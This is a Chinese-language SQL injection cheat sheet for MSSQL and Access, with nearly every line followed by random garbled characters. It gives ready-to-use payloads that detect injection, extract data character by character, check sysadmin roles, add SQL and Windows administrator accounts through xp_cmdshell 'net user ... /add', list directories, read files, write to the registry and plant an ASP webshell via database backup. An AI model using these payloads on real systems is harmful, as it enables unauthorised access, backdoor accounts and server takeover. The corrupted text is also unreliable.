1.判断是否有注入;and 1=1 ;and 1=2 `IEq@Wr#$!
2.初步判断是否是mssql ;and user>0 �Gs[Vu��@*
6(���>3�P�
3.注入参数是字符'and [查询条件] and ''=' Eo%Uu��S�i
i�]it5����
4.搜索时没过滤参数的'and [查询条件] and '%25'=' JN�h=fvO2i
9*�#$0Y=��
5.判断数据库系统 blJ�I�to�'
D�a"yZ\4��
;and (select count(*) from sysobjects)>0 mssql �8@E�8!w&~
?n!lU�r$:y
;and (select count(*) from msysobjects)>0 access ]]>nbgGn�#
���ecn}�iN
�>@^<S_KVh
9'�1hjd�3k
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @��ru<4`�h
q1�H�=�/[a
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 x+4�v�s��s
|5W8��Q|>%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �]Z��_$'?f
+H7y/#e+3�
9.(1)猜字段的ascii值(access) 4[`[mE18�.
^w>�&?A�'!
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )AOP�iC$jL
Hw �Z^D=�A
(2)猜字段的ascii值(mssql) l1&5�uwuF
Bb~5& @M|N
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �l{�8CISO*
P�*0f~eu��
10.测试权限结构(mssql) �PC|'yAN:
GE�@uO�J6H
[q�'eEN�G�
��(#oY�yM]
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~�]&B��>q�
V{!lk�]p}a
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <KtBv I�p]
@:
Z#E[N H
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- HL@TcfOe�~
`mrC�u>7��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- N r<9u$d9=
^��uh�xURF
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V~85oUc\-
gV|Y�54}T�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Rs2-94$�!5
)S2iIi;B�q
;and 1=(select IS_MEMBER('db_owner'));-- pajy�#0� U
8�
}-�7{��
u#FXW_-T�K
8�'��KMxR�
11.添加mssql和系统的帐户 DcN"���=�Y
v�O�]J]][
;exec master.dbo.sp_addlogin username;-- ��>60"�p~t
;exec master.dbo.sp_password null,username,password;-- `�y2�ljIWJ
!N1J@LT5�h
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- At�d1��q�J
]U[&uymax�
;exec master.dbo.xp_cmdshell 'net user username password !A�v1Leb9$
Y''6NGf��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �d��@Z�oV
�r�{S=�Z~J
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 6 Uw�;C84!
z?kd'j`FG�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- u��f�]Y^,2
T`?n,'!(��
0~]QIdu{AR
jn$j^�51`C
12.(1)遍历目录 lU�Ht��jr
��Ff<)�4`J
;create table dirs(paths varchar(100), id int) akC>s8tqlA
[/OQy�b4F<
;insert dirs exec master.dbo.xp_dirtree 'c:\' @h#�Xix�7�
�:�_Fxy5�}
;and (select top 1 paths from dirs)>0 b
��=b���:
=��/Wu'gG)
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) .E$q&�7@/j
�| 3giZ{�
skR,-:"��8
PBr�nz�koY
(2)遍历目录 o@3�B(j;J`
�rz.�I�oQo
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �)b�92yP�{
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 N�d�!�c�2`
��TKOP;[1h
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ;Iq5|rzDn�
u!Bk,�}CE`
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �{y6C0A*��
�%��ek"!A�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 &XQZs�`41+
F7T� �E|LZ
x:�
~d@���
�y(v_-6b��
13.mssql中的存储过程 W�-X�pJ�\_
(6R4 \8z2�
xp_regenumvalues 注册表根键, 子键 >vV�w!.f�J
�A(+:S�"|@
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 JZ�=�5Bpw�
"w&/m}E�,[
xp_regread 根键,子键,键值名 g�1@w����f
$<O�h��Gk-
;exec xp_regread Q�h-4vy�=r
f�HfY}BQ�S
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 "8HE^Po/pn
tpYa?Z�CM
xp_regwrite 根键,子键, 值名, 值类型, 值 <%K�UdkzEP
�FT.@1�/�)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 qq;b~ 3�kW
}��OrYpZob
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 d#\W h�R�E
��O]qPm�Ej
xp_regdeletevalue 根键,子键,值名 �GN%(9N�'W
\r;F�2C0*i
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 <H�Q&-j��x
2xTT)9T�q*
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 d(���S}NH�
A�5XR3$�5P
g��s`> �C(
�3e��KQ<$w
14.mssql的backup创建webshell �
%+wF�"�
fr�qJN����
use model RH1u�Vd�J1
~G��`J��
r
create table cmd(str image); b�k3Un�reh
�g�X,9G�h
insert into cmd(str) values (''); q�#��vl�BL
��` X}�8�5
backup database model to disk='c:\l.asp'; &��+��r��4
�-0 0}�if7
r7I
�B{}>-
I�KcKRw/O$
15.mssql内置函数 irM�d
jG�
c3k|��G<C2
;and (select @@version)>0 获得Windows的版本号 ~>%D�K��Je
yV�S\Q,:J9
;and user_name()='dbo' 判断当前系统的连接用户是不是sa \L[i9m|��e
84����M3c�
;and (select user_name())>0 爆当前系统的连接用户 iP �"�EA�8
Q�)^�g��3J
;and (select db_name())>0 得到当前连接的数据库 FFe)�e>b�H
��U��ix{�"
Q��6�^��x8
=!,G�s�t_�
16.简洁的webshell �)^
�<3\e
%��^.P~�s6
use model HXks_ix �)
k^%_V|&W/(
create table cmd(str image); �5I,$E�GG�
N[k�<@Q?*a
insert into cmd(str) values (''); ��� @�E_zR
4P� kfUM�X
backup database model to disk='g:\wwwtest\l.asp';
